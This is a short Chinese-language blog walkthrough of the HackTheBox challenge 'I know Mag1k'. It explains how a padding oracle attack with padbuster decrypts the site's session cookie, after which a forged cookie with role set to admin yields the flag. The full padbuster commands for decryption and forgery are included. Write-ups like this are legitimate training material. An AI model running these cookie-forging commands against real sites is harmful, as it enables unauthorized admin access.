HackTheBox 复现系列:I know Mag1k

前言

在自己进行测试的时候,尝试了目录扫描,爆破弱口令,SQL注入测试,无果。完成没有头绪,通过谷歌发现此篇文章

https://medium.com/@mrkarthik07/i-know-mag1k-a-padding-oracle-attack-745d3b0bb2b1

发现是利用 Padding Oracle attack 来解密 Cookie。太高级看不懂如下:

我对Padding Oracle攻击的分析和思考(详细):https://www.freebuf.com/articles/web/15504.html

操作

随意注册一个用户,进行登录

HackTheBox 复现系列:I know Mag1k

在 Kali 使用 padbuster 工具,命令如下:padbuster URL 需要解密的Cookie 8 -cookies "登录的Cookie"

padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D"

然后选择:2

HackTheBox 复现系列:I know Mag1k

经过漫长的等待解出内容,我的网速太慢了

HackTheBox 复现系列:I know Mag1k

修改 role 为 admin 然后进行加密

padbuster http://167.71.143.20:30469/profile.php "qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" 8 -cookies "PHPSESSID=vhupjvokjsas3dk96dp7sal6t4;iknowmag1k=qtZ%2FRI6owUxhvBC75xkwIcVDoh7DHBBpo%2BS7NEdfc%2BOnakKjpxjWYA%3D%3D" -plaintext "{\"user\":\"admin\",\"role\":\"admin\"}"

HackTheBox 复现系列:I know Mag1k

成功得到加密的内容

HackTheBox 复现系列:I know Mag1k

替换Cookie 成功拿到 Flag

HackTheBox 复现系列:I know Mag1k

完成没有思路,也不了解怎么能联想到 Padding Oracle attack 。归于原因还是因为自己太菜

上一篇:uni-app发行模式调试debugger


下一篇:《Backdoor Learning: A Survey》阅读笔记